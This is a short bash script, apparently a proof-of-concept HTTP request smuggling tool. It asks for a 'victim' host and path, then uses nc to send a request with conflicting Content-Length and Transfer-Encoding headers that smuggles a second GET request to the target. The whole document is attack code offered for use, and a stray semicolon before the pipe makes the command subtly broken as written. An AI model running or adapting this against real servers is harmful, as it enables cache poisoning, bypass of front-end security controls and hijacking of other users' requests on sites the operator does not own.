#!/bin/bash
echo -ne "[+] Enter Victim: "
read victim

echo -ne "[+] Enter Path: "
read pagepath


echo "POST / HTTP/1.1
Host: $victim
Content-Length: 200
Transfer-Encoding: chunked

0

GET /$pagepath HTTP/1.1
Host: $victim
X: X GET / HTTP/1.1
Host: $victim"; | nc $victim 80